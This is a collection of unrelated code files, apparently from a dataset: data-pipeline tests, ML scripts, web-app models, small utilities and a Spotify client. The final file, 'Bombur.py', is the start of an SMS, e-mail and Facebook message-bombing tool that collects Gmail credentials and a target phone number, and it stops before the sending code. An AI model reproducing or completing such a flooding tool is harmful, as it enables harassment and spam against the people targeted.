actual_results = cf.select_data('*', STEP_CONFIGURATION[step_name]['ps_table'], 'RUN_ID', RUN_ID)
expected_results = pd.read_csv(summary_file, engine='python')
# Formatting and fudgery
actual_results = actual_results.sort_values(
['SERIAL', 'SHIFT_WT', 'NON_RESPONSE_WT', 'MINS_WT', 'TRAFFIC_WT', 'UNSAMP_TRAFFIC_WT', 'IMBAL_WT', 'FINAL_WT'])
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values(
['SERIAL', 'SHIFT_WT', 'NON_RESPONSE_WT', 'MINS_WT', 'TRAFFIC_WT', 'UNSAMP_TRAFFIC_WT', 'IMBAL_WT', 'FINAL_WT'])
expected_results['RUN_ID'] = RUN_ID
expected_results.index = range(0, len(expected_results))
actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\final_summary_actual.csv')
expected_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\final_summary_expected.csv')
assert_frame_equal(actual_results, expected_results, check_dtype=False)
def test_stay_imputation_step():
# Assign variables
conn = database_connection()
step_name = "STAY_IMPUTATION"
dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
# Run Shift Weight step
ips.steps.stay_imputation.stay_imputation_step(RUN_ID, conn)
# Get results of Survey Data and compare
sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
sql_cols = "[SERIAL], " + sql_cols
sql_results = cf.select_data(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, 'RUN_ID', RUN_ID)
expected_results = pd.read_csv(survey_file, engine='python')
# Formatting and fudgery
sql_results = sql_results.dropna(subset=['STAY_IMP_FLAG_PV'])
actual_results = sql_results.sort_values('SERIAL')
actual_results.replace('None', np.nan, inplace=True)
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values('SERIAL')
expected_results.index = range(0, len(expected_results))
assert_frame_equal(actual_results, expected_results, check_dtype=False)
def test_fares_imputation_step():
# Assign variables
conn = database_connection()
step_name = 'FARES_IMPUTATION'
dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
# Run Shift Weight step
ips.steps.fares_imputation.fares_imputation_step(RUN_ID, conn)
# Get results of Survey Data and compare
sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
sql_cols = "[SERIAL], " + sql_cols
# Get results of Survey Data and compare
sql = """
SELECT {}
FROM {}
WHERE RUN_ID = '{}'
AND SERIAL not like '9999%'
AND RESPNSE between 1 and 6
""".format(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, RUN_ID)
# Using comparison data populated by Python from unit test due
# to random values populated in OPERA_PV. NOT USING SAS BASELINE DATA
actual_results = pd.read_sql_query(sql, conn)
expected_results = pd.read_csv(survey_file, engine='python')
# Formatting and fudgery
actual_results = actual_results.sort_values('SERIAL')
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values('SERIAL')
expected_results.index = range(0, len(expected_results))
actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\fares_survey_actual.csv')
assert_frame_equal(actual_results, expected_results, check_dtype=False)
def test_spend_imputation_step():
# Assign variables
conn = database_connection()
# Run Spend Imputation step
ips.steps.spend_imputation.spend_imputation_step(RUN_ID, conn)
sql = """
SELECT [SERIAL], [SPENDK], [SPEND] as 'newspend'
FROM {}
WHERE RUN_ID = '{}'
AND [SERIAL] not like '9999%'
AND [RESPNSE] between '1' and '6'
AND [SPEND_IMP_ELIGIBLE_PV] = '1'
""".format(idm.SURVEY_SUBSAMPLE_TABLE, RUN_ID)
actual_results = pd.read_sql_query(sql, conn)
# Merge results from Fares in to SAS comparison data to create expected dataset
fares_output = pd.read_csv(TEST_DATA_DIR + r'\fares_imputation\surveydata_out_expected.csv',
engine='python')
sas_spend_output = pd.read_csv(TEST_DATA_DIR + r'\spend_imputation\surveydata_out_expected.csv',
engine='python')
fares_output = fares_output[['SERIAL', 'SPEND']].copy()
fares_output.sort_values(by='SERIAL', inplace=True)
fares_output.index = range(0, len(fares_output))
sas_spend_output = sas_spend_output[['SERIAL', 'SPENDK', 'newspend']].copy()
sas_spend_output.sort_values(by='SERIAL', inplace=True)
sas_spend_output.index = range(0, len(sas_spend_output))
expected_results = pd.merge(sas_spend_output, fares_output, on='SERIAL', how='left')
expected_results.loc[(np.isnan(expected_results['newspend'])), 'newspend'] = expected_results['SPEND']
expected_results.drop(columns='SPEND', inplace=True)
# Formatting and fudgery
actual_results = actual_results.sort_values('SERIAL')
actual_results.replace('None', np.nan, inplace=True)
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values('SERIAL')
expected_results.index = range(0, len(expected_results))
actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\spend_survey_actual.csv')
assert_frame_equal(actual_results, expected_results, check_dtype=False)
@pytest.mark.xfail
def test_rail_imputation_step():
# Assign variables
conn = database_connection()
step_name = 'RAIL_IMPUTATION'
dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
# Run Spend Imputation step
ips.steps.rail_imputation.rail_imputation_step(RUN_ID, conn)
# Get results of Survey Data and compare
sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
sql_cols = "[SERIAL], " + sql_cols + ", [SPEND]"
# Get results of Survey Data and compare
sql = """
SELECT SERIAL, SPEND
FROM {}
WHERE RUN_ID = '{}'
AND [SERIAL] not like '9999%'
AND [RESPNSE] between 1 and 6
""".format(idm.SURVEY_SUBSAMPLE_TABLE, RUN_ID)
actual_results = pd.read_sql_query(sql, conn)
expected_results = pd.read_csv(survey_file, engine='python')
# Formatting and fudgery
actual_results = actual_results.sort_values('SERIAL')
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values('SERIAL')
expected_results.index = range(0, len(expected_results))
actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\rail_actual.csv')
expected_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\rail_expected.csv')
assert_frame_equal(actual_results, expected_results, check_dtype=False)
@pytest.mark.xfail
def test_regional_weights_step():
# Assign variables
conn = database_connection()
step_name = 'REGIONAL_WEIGHTS'
dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
# Run Spend Imputation step
ips.steps.regional_weights.regional_weights_step(RUN_ID, conn)
# Get results of Survey Data and compare
# sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
# sql_cols = "[SERIAL], " + sql_cols
sql_cols = '[SERIAL], [NIGHTS1], [NIGHTS2], [NIGHTS3], [NIGHTS4], [NIGHTS5], [NIGHTS6], [NIGHTS7], [NIGHTS8], [EXPENDITURE_WT], [EXPENDITURE_WTK], [STAY1K], [STAY2K], [STAY3K], [STAY4K], [STAY5K], [STAY6K], [STAY7K], [STAY8K], [STAY_WT], [STAY_WTK], [VISIT_WT], [VISIT_WTK]'
sql = """
SELECT {}
FROM {}
WHERE RUN_ID = '{}'
AND [SERIAL] not like '9999%'
AND [RESPNSE] between 1 and 6
AND [REG_IMP_ELIGIBLE_PV] = 1
""".format(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, RUN_ID)
actual_results = pd.read_sql_query(sql, conn)
expected_results = pd.read_csv(survey_file, engine='python')
# Formatting and fudgery
actual_results = actual_results.sort_values('SERIAL')
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values('SERIAL')
expected_results.index = range(0, len(expected_results))
actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\regional_actual.csv')
assert_frame_equal(actual_results, expected_results, check_dtype=False)
@pytest.mark.xfail
def test_town_stay_expenditure_imputation_step():
# Assign variables
conn = database_connection()
step_name = 'TOWN_AND_STAY_EXPENDITURE'
dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
# Run Spend Imputation step
ips.steps.town_stay_expenditure.town_stay_expenditure_imputation_step(RUN_ID, conn)
# Get results of Survey Data and compare
# sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
# sql_cols = "[SERIAL], " + sql_cols
sql_cols = '[SERIAL], [SPEND1], [SPEND2], [SPEND3], [SPEND4], [SPEND5], [SPEND6], [SPEND7], [SPEND8]'
# Get results of Survey Data and compare
sql = """
SELECT {}
FROM {}
WHERE RUN_ID = '{}'
AND [SERIAL] not like '9999%'
AND [RESPNSE] between 1 and 6
AND [TOWN_IMP_ELIGIBLE_PV] = 1
""".format(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, RUN_ID)
actual_results = pd.read_sql_query(sql, conn)
expected_results = pd.read_csv(survey_file, engine='python')
# Formatting and fudgery
actual_results = actual_results.sort_values('SERIAL')
actual_results.replace('None', np.nan, inplace=True)
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values('SERIAL')
expected_results.index = range(0, len(expected_results))
actual_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\town_stay_actual.csv')
expected_results.to_csv(r'S:\CASPA\IPS\Testing\scratch\compare these\town_stay_expected.csv')
assert_frame_equal(actual_results, expected_results, check_dtype=False)
def test_airmiles_step():
# Assign variables
conn = database_connection()
step_name = 'AIR_MILES'
dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
# Run Spend Imputation step
ips.steps.air_miles.airmiles_step(RUN_ID, conn)
# Get results of Survey Data and compare
sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
sql_cols = "[SERIAL], " + sql_cols
actual_results = cf.select_data(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, 'RUN_ID', RUN_ID)
expected_results = pd.read_csv(survey_file, engine='python')
# Formatting and fudgery
actual_results = actual_results.sort_values('SERIAL')
actual_results.replace('None', np.nan, inplace=True)
actual_results.index = range(0, len(actual_results))
expected_results = expected_results.sort_values('SERIAL')
expected_results.index = range(0, len(expected_results))
assert_frame_equal(actual_results, expected_results, check_dtype=False)
|
996,609 | 2631daeb2b4b44426fcfef5fd4c472595a0e6618 | import sublime
import sublime_plugin
def plugin_loaded():
value = get_setting()
sublime.log_input(value);
sublime.log_commands(value);
sublime.log_result_regex(value);
def get_setting():
preferences = sublime.load_settings("Preferences.sublime-settings")
result = preferences.get("debug")
if result is None:
result = False
return result
|
996,610 | bc78a599175873a1e017b783adec333ee360d9ad | #!/usr/bin/python3
# -*- coding: utf-8 -*-
'''
Created by Tan.Xing
Created date: 2019/01/03
Last edited: 2019/01/03
'''
import sys
from PyQt5.QtWidgets import QApplication
from UI.UiController import windowController
from Widget.SafeCloseWindow import SafeCloseMainWindow
if __name__ == '__main__':
app = QApplication(sys.argv)
mainWindow = SafeCloseMainWindow()
main = windowController(mainWindow)
mainWindow.setFixedSize(1036, 660)
mainWindow.show()
sys.exit(app.exec_())
pass |
996,611 | 1f78f469b32e45726326cb95b14d4a383c5e5d68 | # Imports
from sklearn import svm
import sklearn.cross_validation as cv
from sklearn.grid_search import GridSearchCV
from sklearn.cross_validation import train_test_split
from sklearn.cross_validation import StratifiedKFold
from sklearn.metrics import classification_report
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import csv
import numpy as np
#Useful load function
loadData = lambda txt: np.genfromtxt(open(txt,'r'), delimiter = ',')
#Data class created for easier manipulation of the training, labels and test data
class Data(object):
def __init__(self,features,labels,test):
self.features = features
self.labels = labels
self.test = test
def do_grid_search(self,C_range,g_range,score,k):
# Split the dataset in a devlopment and evaluation set
tuned_parameters = [{'kernel': ['rbf'], 'gamma': g_range,
'C': C_range}]
cvk = StratifiedKFold(self.labels,k=3)
print cvk
print("# Tuning hyper-parameters for %s" % score)
#Conducts a gridsearch over the defined parameters and selects the parameters that have
#the best score based on the scoring paramter
self.classifier = GridSearchCV(svm.SVC(), tuned_parameters, cv = cvk, scoring = score)
self.classifier.fit(self.features, self.labels)
print "Best parameters set found on development set:"
print self.classifier.best_estimator_
#Prints the grid scores, as this is stored in the classifier as a variable
print "Grid scores on development set:"
for params, mean_score, scores in self.classifier.grid_scores_:
print("%0.3f (+/-%0.03f) for %r" % (mean_score, scores.std() / 2, params))
#def semisupervised_boost():
def pca_transform(self,n_components,whiten_bool):
pca = PCA(n_components,whiten_bool)
self.features = pca.fit_transform(self.features)
self.test = pca.transform(self.test)
def estimate_score(self,k):
scores = cv.cross_val_score(self.classifier.best_estimator_,self.features,self.labels,cv = k)
print('Estimated score: %0.5f (+/- %0.5f)' % (scores.mean(), scores.std() / 2))
#Main script
if __name__ == '__main__':
#Loading csv files
trainFeatures = loadData('train.csv')
trainLabels = loadData('trainLabels.csv')
testFeatures = loadData('test.csv')
#Create nstance of Data class
data = Data(trainFeatures,trainLabels, testFeatures)
#Estimator parameter grid search
C_range = [1, 100, 1000, 10000, 100000, 1000000]
g_range = [0.0001,0.001,0.01, 0.1, 0.2,0.27777778,0.3]
#Score for parameter evaluation, also possible: f1, precision, accuracy, recall...
score = 'accuracy'
#K folds for cross validation of score evaluation
k = 5
#Methods and data manipulation
data.pca_transform(n_components = 12, whiten_bool= True)
data.do_grid_search(C_range,g_range,score,k)
data.estimate_score(k=60)
# Write results file in the form specified under the competition details
resultsFile = open('results.csv','w')
#best classifier obtained from grid search is used
results = data.classifier.best_estimator_.predict(data.test)
count = 0
resultsFile.write('Id,Solution\n')
for label in results:
count += 1
resultsFile.write('%d,%d\n' % (count,label))
#solution = classifier.predict(testFeatures)
resultsFile.close()
|
996,612 | 6b4486f2001da41dff99e9e480f214c0fe61a093 | import os
import menu
import post
import sml
import template
def get_posts(posts_src_dir):
post_filenames = [fn for fn in os.listdir(posts_src_dir) if fn.endswith('.post')]
for post_filename in post_filenames:
post_path = os.path.join(posts_src_dir, post_filename)
yield post.from_file(
post_path,
)
def generate(posts_src_dir, posts_target_dir):
post_list = get_posts(posts_src_dir)
post_list = list(filter(lambda p: p.published != None, post_list))
post_list = list(sorted(
post_list,
key = lambda p: p.published,
reverse = True,
))
if len(post_list) > 0:
newest_post = post_list[0]
oldest_post = post_list[-1]
else:
newest_post = None
oldest_post = None
oldest_post_list = ([oldest_post] * (len(post_list) - 1)) + [None]
previous_post_list = post_list[1:] + [None]
next_post_list = [None] + post_list[:-1]
newest_post_list = [None] + ([newest_post] * (len(post_list) - 1))
zipped = zip(
oldest_post_list,
previous_post_list,
post_list,
next_post_list,
newest_post_list,
)
for oldest_post, previous_post, current_post, next_post, newest_post in zipped:
post_target_path = os.path.join(posts_target_dir, current_post.link_filename)
traversal_links = post.get_traversal_links(
oldest_post,
previous_post,
next_post,
newest_post,
)
with open(post_target_path, 'w') as f:
f.write(template.apply_base_template(
current_post.title,
current_post.authors,
current_post.keywords,
current_post.description,
post.to_html(current_post, menu.MENU, traversal_links),
))
yield post.filename_to_link(current_post.link_filename, current_post)
|
996,613 | 02ea7223d5ff84b3b3235ab27789f18d8af1d73e | from sqlalchemy import Boolean, Column, Integer, String, Enum
from database import Base
from schemas import Role
class User(Base):
__tablename__ = "users"
id = Column(Integer, primary_key=True, index=True)
email = Column(String, unique=True, index=True)
username = Column(String, unique=True, index=True)
full_name = Column(String)
hashed_password = Column(String)
otp_secret = Column(String)
disabled = Column(Boolean, default=False)
role = Column(Enum(Role))
|
996,614 | 827b0f9551ae9bd2244b0c77a29222f0030d7122 | import os, sys
import pickle
import random
import numpy as np
from PIL import Image
import torch
from torch.utils.data import *
from . import skeleton # import skeleton
from .dataset_utils import * # from dataset_utils import *
class Human36m(Dataset):
def __init__(self, root_dir, modality, return_count, image_size, normalize, shuffle, sample_count,
keypoint_size=5, skeleton_width=2, extend_ratio=0.2, random_flip=False, random_crop=False):
super(Human36m, self).__init__()
self.root_dir = root_dir
self.modality = modality
self.return_count = return_count
self.image_size = image_size
self.normalize = normalize
self.shuffle = shuffle
self.sample_count = sample_count
self.keypoint_size = keypoint_size
self.skeleton_width = skeleton_width
self.extend_ratio = extend_ratio
self.random_flip = random_flip
self.random_crop = random_crop
skeleton.keypoint_size = keypoint_size
skeleton.skeleton_width = skeleton_width
# load the list of all images
self.all_videos = os.listdir(root_dir)
self.video_count = len(self.all_videos)
# current sample pos for each video
self.pos = [0 for _ in range(self.video_count)]
self.all_metadata = list()
for video in self.all_videos:
with open(os.path.join(root_dir, video, 'metadata.pkl'), 'rb') as f_in:
metadata = pickle.load(f_in)
if not shuffle or sample_count is not None:
# fixed by the same seed
old_state = random.getstate()
random.seed(0)
if sample_count is not None:
metadata = random.sample(metadata, sample_count)
else:
random.shuffle(metadata)
random.setstate(old_state)
if shuffle:
random.shuffle(metadata)
self.all_metadata.append(metadata)
def __len__(self):
return self.video_count
def __getitem__(self, item):
video = self.all_videos[item]
metadata = self.all_metadata[item]
image_count = len(metadata)
# self.pos[item], self.pos[item] + 1, ..., self.pos[item] + self.return_count - 1
if self.pos[item] + self.return_count > image_count:
# reset
self.pos[item] = 0
if self.shuffle:
random.shuffle(metadata)
images = list()
skeletons = list()
# read images
for i in range(self.return_count):
idx = self.pos[item] + i
file_name, bbox, keypoints_img, depth = metadata[idx]
img_fullname = os.path.join(self.root_dir, video, file_name)
img = Image.open(img_fullname).convert('RGB')
w, h = img.size
# get base box
x1, y1, x2, y2 = bbox
# extend the box to square
x1, y1, x2, y2, side = extend_box_to_square(x1, y1, x2, y2, w, h)
# space left on four sides
left = x1
right = w - x2
up = y1
down = h - y2
if self.random_crop:
max_extend = min(left + right, up + down)
max_extend = min(max_extend, side * self.extend_ratio)
extend = random.uniform(0, max_extend)
extend_left = random.uniform(max(0, extend - right), min(left, extend))
extend_right = extend - extend_left
extend_up = random.uniform(max(0, extend - down), min(up, extend))
extend_down = extend - extend_up
new_x1 = x1 - extend_left
new_y1 = y1 - extend_up
new_x2 = x2 + extend_right
new_y2 = y2 + extend_down
else:
extend_ratio = self.extend_ratio / 2 # for one side
extend = min(left, right, up, down)
extend = min(extend, side * extend_ratio)
new_x1 = x1 - extend
new_y1 = y1 - extend
new_x2 = x2 + extend
new_y2 = y2 + extend
# calculate new coordinates
keypoints_img_new = keypoints_img.copy()
keypoints_img_new[:, 0] -= new_x1
keypoints_img_new[:, 1] -= new_y1
# crop the image
cropped_img = img.crop((new_x1, new_y1, new_x2, new_y2))
new_w, new_h = cropped_img.size
# random flip
indicator = random.random()
if indicator >= 0.5:
flip = True
cropped_img = cropped_img.transpose(Image.FLIP_LEFT_RIGHT)
keypoints_img_new[:, 0] = new_w - 1 - keypoints_img_new[:, 0]
else:
flip = False
# resize
ratio_w = self.image_size / new_w
ratio_h = self.image_size / new_h
output_size = (self.image_size, self.image_size)
cropped_img = cropped_img.resize(output_size, Image.LANCZOS)
# convert to tensor
images.append(to_tensor(cropped_img, self.normalize))
# calculate skeleton
keypoints_img_new[:, 0] *= ratio_w
keypoints_img_new[:, 1] *= ratio_h
if self.modality == 'skeleton_2d':
skeleton_img = skeleton.skeleton_2d(output_size, keypoints_img_new, depth, flip)
skeleton_img = to_tensor(skeleton_img, self.normalize)
skeletons.append(skeleton_img)
elif self.modality == 'skeleton_rgbd':
skeleton_img, depth_img = skeleton.skeleton_rgbd(output_size, keypoints_img_new, depth, flip)
skeleton_img = to_tensor(skeleton_img, self.normalize)
depth_img = torch.from_numpy(depth_img)
depth_img = torch.unsqueeze(depth_img, dim=0)
skeleton_img = torch.cat((skeleton_img, depth_img), dim=0)
skeletons.append(skeleton_img)
else:
raise NotImplementedError()
# move forward pointer
self.pos[item] += self.return_count
# output
skeleton_t = skeletons[0]
image_t = images[0]
skeletons = torch.stack(skeletons[1:])
images = torch.stack(images[1:])
return item, images, skeletons, image_t, skeleton_t
if __name__ == '__main__':
# testing
import matplotlib.pyplot as plt
image_dir = r'D:\Work\human36m\sampled_images'
modality = 'skeleton_rgbd'
return_count = 3
image_size = 256
normalize = True
extend_ratio = 0.2
random_flip = True
random_crop = True
# including the ground truth image
return_all = return_count + 1
dataset = Human36m(image_dir, modality, return_all, image_size, normalize, 5, 2,
extend_ratio=0.2, random_flip=random_flip, random_crop=random_crop)
print(len(dataset))
for i, (item, images, skeletons, image_t, skeleton_t) in enumerate(dataset):
assert i == item
assert images.size(0) == return_count
assert skeletons.size(0) == return_count
image_t = torch.unsqueeze(image_t, dim=0)
images = torch.cat((image_t, images), dim=0)
skeleton_t = torch.unsqueeze(skeleton_t, dim=0)
skeletons = torch.cat((skeleton_t, skeletons), dim=0)
# image
skeletons_rgb = skeletons[:, :-1, ...]
canvas = Image.new('RGB', (return_all * image_size, 3 * image_size), 'white')
for j in range(return_all):
# original RGB image
ii = to_pil_image(images[j], normalize)
canvas.paste(ii, (j * image_size, 0))
# RGB skeleton
ss = to_pil_image(skeletons_rgb[j], normalize)
canvas.paste(ss, (j * image_size, image_size))
# skeleton drawn over the original image
ii_arr = np.array(ii)
ss_arr = np.array(ss)
nonzero_pos = np.nonzero(np.sum(ss_arr, axis=-1))
fused_arr = ii_arr.copy()
fused_arr[nonzero_pos] = ss_arr[nonzero_pos]
fused = Image.fromarray(fused_arr)
canvas.paste(fused, (j * image_size, 2 * image_size))
plt.clf()
plt.imshow(canvas)
plt.show()
# depth
skeletons_depth = skeletons[:, -1, ...]
depth_canvas = np.zeros((image_size, return_all * image_size), dtype=np.float32)
for j in range(return_all):
depth_canvas[..., j * image_size: (j + 1) * image_size] = skeletons_depth[j].numpy()
plt.clf()
plt.imshow(depth_canvas, cmap=skeleton.skeleton_colormap)
plt.colorbar()
plt.show()
|
996,615 | c5b514866a5b73a46d5b49819a52c75bfd26a92f | a = "All"
b = " work"
c = " and"
d = " no"
e = " play"
f = " makes"
g = " Jack"
h = " a"
i = " dull"
j = " boy"
print (a+b+c+d+e+f+g+h+i+j)
print(6 *(1 -2))
# ah lekker bier
bruce = 6
print(bruce + 4)
x = str(51 % 24 +2)
y = " uur"
print(x+y)
response = input(100) #principal amount
|
996,616 | 4d10af56cb39939c35f8e813c6f8e13c13fecbdc | from django.db import models
class Propiedad(models.Model):
name = models.CharField(max_length=50)
address = models.CharField(max_length=100)
square_meters = models.PositiveSmallIntegerField()
email = models.EmailField(max_length=50)
|
996,617 | 0315e63470993b4158d5549358ccd318b7888609 | """
1. Create an empty stack called op_stack for keeping operators. Create an empty list for
output.
2. Convert the input infix string to a list by using the string method split.
3. Scan the token list from left to right.
• If the token is an operand, append it to the end of the output list.
• If the token is a left parenthesis, push it on the op_stack.
• If the token is a right parenthesis, pop the op_stack until the corresponding left
parenthesis is removed. Append each operator to the end of the output list.
• If the token is an operator, *, /, +, or −, push it on the op_stack. However, first
remove any operators already on the op_stack that have higher or equal precedence
and append them to the output list.
When the input expression has been completely processed, check the op_stack. Any
operators still on the stack can be removed and appended to the end of the output list.
"""
from Stack import *
def infix_to_postfix(string):
op_stack = Stack()
postfix_list = []
token_string = string.split()
prec = {}
prec["*"] = 3
prec["/"] = 3
prec["+"] = 2
prec["-"] = 2
prec["("] = 1
for token in token_string:
if token in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' or token in '0123456789':
postfix_list.append(token)
elif token == '(':
op_stack.push(token)
elif token == ')':
top_token = op_stack.pop()
while top_token != '(':
postfix_list.append(top_token)
top_token = op_stack.pop()
else:
while (not op_stack.is_empty()) \
and (prec[op_stack.peek()] >= prec[token]):
postfix_list.append(op_stack.pop())
op_stack.push(token)
while not op_stack.is_empty():
postfix_list.append(op_stack.pop())
print("String: ", string, "\nConverion: ", end='')
return " ".join(postfix_list)
#print(infix_to_postfix("( A + B ) * ( C + D )"))
print(infix_to_postfix("( A + B ) * C"))
|
996,618 | 06cf5d30837cdf38998ed15acb4cef488067d374 | import xlsxwriter
current_row = 2
NAME_COLUMN = "A"
LAT_COLUMN = "B"
LNG_COLUMN = "C"
workbook = xlsxwriter.Workbook("data/Kommuners_Koordinater.xlsx", {
'constant_memory': True
})
worksheet = workbook.add_worksheet()
worksheet.write(f"{NAME_COLUMN}1", "name")
worksheet.write(f"{LAT_COLUMN}1", "lat")
worksheet.write(f"{LNG_COLUMN}1", "lng")
def write_to_file(name, lat, lng):
global current_row
worksheet.write(f"{NAME_COLUMN}{current_row}", name)
worksheet.write(f"{LAT_COLUMN}{current_row}", lat)
worksheet.write(f"{LNG_COLUMN}{current_row}", lng)
current_row += 1
def save_file():
workbook.close()
|
996,619 | 267978e5da11b40fb499e2f0b7380464ad0c913d | from rest_framework.authtoken.models import Token
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.views import APIView
__all__ = ['TokenRetrieveView']
class TokenRetrieveView(APIView):
permission_classes = (IsAuthenticated,)
def get(self, request, format=None):
token, created = Token.objects.get_or_create(user=request.user)
return Response(data={'key': token.key})
|
996,620 | 6ca98192b617b61dd797b94249962982ccc02462 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import unittest
from lib import executeTestCase
from lib import runner,utils
from lib.launcher import *
from lib.dde_dock import *
result = True
casename = 'all-3356:有道词典开启与关闭'
class YoudaoDict(unittest.TestCase):
caseid = '83365'
@classmethod
def setUpClass(cls):
cls.appName = 'youdao-dict'
cls.winName = '有道词典'
cls.oldWindows = getAllWindows()
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
pass
def tearDown(self):
subprocess.check_call("ps aux |grep youdao |grep -v grep |grep -v backend |awk '{print $2}' |xargs kill -9", shell=True)
def testYoudao1(self):
subprocess.check_call(self.appName + ' &', shell=True)
winName = getAllWindowNames()
dockApps = Dock().getAllApps()
self.assertIn(self.winName,winName)
self.assertIn(self.winName,dockApps)
def testYoudao2(self):
Dock().dockObj.child('Launcher').click()
launcher.searchApp(self.appName)
sleep(1)
pyautogui.press('enter')
winName = getAllWindowNames()
self.assertIn(self.winName,winName)
def suite():
suite = unittest.TestSuite()
suite.addTest(YoudaoDict('testYoudao1'))
suite.addTest(YoudaoDict('testYoudao2'))
return suite
if __name__ == "__main__":
executeTestCase.runTest(YoudaoDict)
|
996,621 | 4f7f54cb55839c1bc49ee56f30392466cda76d66 | import re
import spotipy
from spotipy.oauth2 import SpotifyClientCredentials
from spotipy.oauth2 import SpotifyOauthError
from playlist.config import settings
class SpotifyService:
def __init__(self):
try:
self.spotify = spotipy.Spotify(
client_credentials_manager=SpotifyClientCredentials()
)
except SpotifyOauthError:
self.spotify = spotipy.Spotify(
client_credentials_manager=SpotifyClientCredentials(
client_id=settings.SPOTIPY_CLIENT_ID,
client_secret=settings.SPOTIPY_CLIENT_SECRET,
)
)
self.fields = settings.get("spotify.playlist.fields")
self.track_fields = settings.get("spotify.playlist.track.fields")
def get_playlist_info(self, playlist):
self._id_validator(playlist)
info = None
if info is None or self.pull:
info = self.spotify.playlist(
playlist_id=playlist, fields=self.fields
)
return info
def get_playlist_tracks(self, playlist):
self._id_validator(playlist)
tracks = []
if self.track_fields is not None:
self.track_fields += ",next,limit,previous,offset,total"
if len(tracks) == 0:
results = self.spotify.playlist_items(
playlist_id=playlist, fields=self.track_fields
)
tracks = results["items"]
while results["next"]:
results = self.spotify.next(results)
tracks.extend(results["items"])
return tracks
def _id_validator(self, playlist):
uri_regex = r"spotify:(episode|show|playlist|track|album|artist|user):[a-zA-Z0-9]+"
id_only_regex = "[a-zA-Z0-9]+"
if playlist is None:
raise ValueError(
"Invalid Spotify ID reason: value can't be None, allowed format: < '%s' >"
% uri_regex
)
if not re.match(uri_regex, playlist) or not re.match(
id_only_regex, playlist
):
raise ValueError(
"Invalid Spotify ID reason: value does not match pattern: < '%s' >"
% uri_regex
)
|
996,622 | baf8f7758323942a41cc0dd00eff91a92f13d5eb | resposta = input('Você deseja adicionar mais nomes a competição?')
dic={}
menor = 10000000000
while resposta != 'sair':
if resposta != 'sair':
a = float(input('Qual a aceleração de cada corredor?'))
dic[resposta] = a
resposta = input('Você deseja adicionar mais nomes a competição?')
tempo = calcula_tempo(dic)
for k,v in tempo.items():
if v < menor:
menor = v
chave = k
print('O vencedor é {} com o tempo de conclusão de {} s'.format(chave,menor))
|
996,623 | 9165e36a9add2486e92aec2aa099ac845c7545c6 | #! python3
__author__ = 'KattStof'
#Bombur.py - a simple email/sms/facebook bombing script
# One Script to rule them all
from colorama import Fore, init
import smtplib, getpass, time
from fbchat import Client
from fbchat.models import *
from GSMS import GSMS
init(convert=True)
print( Fore.YELLOW + """
_______ ______ ___ ___ _______ ____ ____ _______
| _ "\ / " \ |" \ /" || _ "\ (" _||_ " | /" \
(. |_) :) // ____ \ \ \ // |(. |_) :)| ( ) : ||: |
|: \/ / / ) :)/\\ \/. ||: \/ (: | | . )|_____/ )
(| _ \\(: (____/ //|: \. |(| _ \\ \\ \__/ // // /
|: |_) :)\ / |. \ /: ||: |_) :) /\\ __ //\ |: __ \
(_______/ \"_____/ |___|\__/|___|(_______/ (__________)|__| \___)
""")
print(Fore.GREEN + '1) SMS Bomb')
print('2) E-mail Bomb')
print('3) Facebook Bomb')
choice = input("Enter Option: ")
if choice == '1':
mailserver = smtplib.SMTP_SSL('smtp.gmail.com', 465)
mailserver.ehlo()
username = input('Enter Gmail Email Address: ')
password = getpass.getpass()
print(' 1)AT&T \n 2)Verizon \n 3)T-Mobile \n 4)Sprint \n 5)VirginMobile \n 6)USCellular \n 7)Boost')
carrier = input('Enter Phone Carrier: ')
number = input('Enter Phone Number: ')
texttosend = input("Messge to send: ")
ammount = int(input('Number of texts to send: '))
if carrier == '1':
carrier = 'att'
elif carrier == '2':
carrier = 'verizon'
elif carrier == '3':
carrier = 'tmobile'
elif carrier == '4':
carrier = 'sprint'
elif carrier == '5':
carrier = 'virgin'
